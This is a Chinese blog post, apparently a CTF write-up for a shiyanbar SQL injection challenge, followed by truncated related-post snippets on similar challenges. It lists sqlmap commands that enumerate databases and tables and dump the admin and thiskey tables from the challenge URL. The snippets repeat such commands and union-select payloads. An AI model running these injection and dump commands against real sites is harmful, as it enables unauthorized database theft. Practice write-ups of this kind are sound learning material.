2. 程式人生 > >【fairy】實驗吧——這個看起來有點簡單!

【fairy】實驗吧——這個看起來有點簡單!

阿新 發佈:2019-02-20

emmmm。sql注入,先試試sqlmap【我才不是不會手注呢,好吧,真的不會!!

(1)爆庫: sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=2" --dbs

(2)爆表:sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=2" --table -D test

(3)爆欄位:sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=2" --dump -T admin -D test

咦~這不是另外一道題的登入密碼嗎【手動滑稽

emmmm。重新來~

(4)爆表:sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=2" --table -D my_db

emmm。這次應該對了

(5)爆欄位:sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=2" --dump -T thiskey -D my_db

get~ok

相關推薦

fairy實驗——這個起來有點簡單!

emmmm。sql注入,先試試sqlmap【我才不是不會手注呢,好吧,真的不會!! (1)爆庫: sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=2" --dbs (2)爆表:sqlmap -u "h

fairy實驗——起來有點

題目連結:ctf5.shiyanbar.com/basic/inject/index.php 看起來像是注入,比較菜,就直接sqlmap了= = 1)爆庫:sqlmap -u “ctf5.shiyanbar.com/basic/inject/index.php?adm

實驗-CTF-web-忘記密碼了&&這個起來有點簡單 (學習筆記)

實驗環境 firefox BurpsuitePro-v1.6 sqlmap(kali) 忘記密碼了 題目為一個連結 開啟是一個輸入郵箱接收重置密碼的網頁,檢視原始碼發現管理員郵箱,vim格式,可能會有一個備份檔案.swp,還有一個重置密碼連結 構造一下url,改為http

fairy實驗web題——爆破

最近沉迷於爆破= = 給你一個sha1值,它是0-100000之間的整數的md5值再求取sha1值,請在2秒內提交該整數值 題幹表述的很清楚,就是讓你碰撞出hash值對應的原來的值。 emmmm。又到了寫指令碼的時候了!!! 我們很容易發現提交資料為post請

實驗ctf題庫:這個起來有點簡單

       這是一道十分基礎的web題目,因為我也是剛剛接觸ctf,記錄一下第一道題的解題過程,算是自己的一個回顧吧,同時也給一些想要入門的朋友一點點微弱的參考吧。一、sqlmap的安裝       在windows下安裝sqlmap需要先下載適用windows的sqlma

這個起來有點簡單!--實驗

手工檢測是否存在sql注入(經典id=1'加入單引號提交,結果:如果出現錯誤提示,則該網站可能就存在注入漏洞) 使用sqlmap爆出當前資料庫my_db 發現可能藏有key值的thiskey表 進

實驗-CTF-web-忘記密碼了&&這個起來有點簡單 (學習筆記)

實驗環境 firefox BurpsuitePro-v1.6 sqlmap(kali) 忘記密碼了 題目為一個連結 開啟是一個輸入郵箱接收重置密碼的網頁,檢視原始碼發現管理員郵箱,vim格式,可能會有一個備份檔案.swp,還有一個重置密碼連結 構造一下url

實驗ctf-web題:這個起來有點簡單

從今天開始做實驗吧的CTF習題,爭取一天一道,一天一總結,做到不貪多,不糊弄,每天學習一點點,每天進步一點點。 今天做的是這個看起來有點簡單這個題,是一道SQL注入的題目。用了兩種方法,一種就是從url進行sql注入,一種是使用sqlmap工具。 預

union註入的幾道ctf題,實驗簡單的sql註入1,2,這個起來有點簡單和bugku的成績單

需要 簡單 details 9.png lmap bug 輸入數據 php 接下來 這幾天在做CTF當中遇到了幾次sql註入都是union,寫篇博客記錄學習一下。 首先推薦一篇文章“https://blog.csdn.net/Litbai_zhan

這個起來有點簡單!

Topic Linkhttp://ctf5.shiyanbar.com/8/index.php1)  先進行測試發現存在注入漏洞2)爆庫 3) 爆表4) 爆段5) 爆koy第二種做法2)爆庫3)爆表4)

實驗-起來有點基於sleep的sql注入指令碼

                原題內容: 切,你那水平也就這麼點了,這都是什麼題啊!!! 解題

實驗 起來有點難(手工註入加sqlmap註入)

wid ati 實驗 alt 成功 技術 pytho code login 嗯~打開題目看見一個逼格有點高的圖 查看網頁源代碼,表單以get的方式傳送三個參數(admin,pass,action)給index.php,但是限制了兩個輸入框的最大長度是10,這個是前端的限制

實驗-CTF-web-頭有點大&&貌似有點難&&起來有點難(學習筆記)

實驗環境 sqlmap(kali2.0) BurpsuitePro-v1.6 firefox 頭有點大 題目連結:http://www.shiyanbar.com/ctf/29 打開發現說缺少 .net framework9.9,但是沒有9.9版本,還要求在英格蘭地區

實驗--起來有點難--盲注+burpsuite爆破

看起來有點難解題思路 1.觀察題目,使用者名稱和密碼這兩個引數都是通過GET方法傳輸。 2.通過對admin、pass兩個引數的測試,得出以下結論。 1)使用者名稱為admin時,返回“登陸失敗,錯誤的使用者名稱和密碼”。 2)使用者名稱為非admin欄位的時候,返回“資料庫連線失敗

實驗 起來有點難(手工注入加sqlmap注入)

嗯~開啟題目看見一個逼格有點高的圖 檢視網頁原始碼,表單以get的方式傳送三個引數(admin,pass,action)給index.php,但是限制了兩個輸入框的最大長度是10,這個是前端的限制,形同虛設。我們可以用按瀏覽器的F12,改變其值的大小,或者在URL欄中輸入都可以。 然後我們在輸入框中隨便

實驗——web之“起來有點難”詳解

連結: 工具:kali(sqlmap) 解題思路及方法: 首先進入題目連結,看到這個分值,不禁讓我很擔心,這還是我第一個50分值的題目,而且難度也是難,給的說明也是那麼霸氣。。。。。。。 這些資訊都在向我們透露這題的難度,我也是抱著嘗試的心理去試試,並沒想

實驗這題起來簡單

index.php 分享圖片 name alt where select bar nbsp .sh 知識點:查詢庫名:union select 1,schema_name from information_schema.schemata     查詢表名:un

Linux下查進程打開的文件句柄數

art blog targe 時間 ase 響應時間 nbsp lin repl ---查看系統默認的最大文件句柄數,系統默認是1024 # ulimit -n 1024 ----查看當前進程打開了多少句柄數 # lsof -n|awk ‘{print $2}‘|sort

STSRM10dp只會規律

uniq pen 註意 矩形 open 全部 sizeof sed type 【算法】區間DP 【題意】平面上有n個點(xi,yi),用最少個數的底邊在x軸上且面積為S的矩形覆蓋這些點(在邊界上也算覆蓋),n<=100。 【題解】隨機大數據下,貪心幾乎沒有錯誤,貪心出

分享Windows日誌查工具分享

hub class 後來 windows.h int href 問題 命令 lin   在Linux下查看日誌,使用tail、grep、find等命令還比較方便,後來需要在Windows中處理一些問題,發現缺少類似的功能,比如tailf實時輸出,於是在網上收集了一些相關的小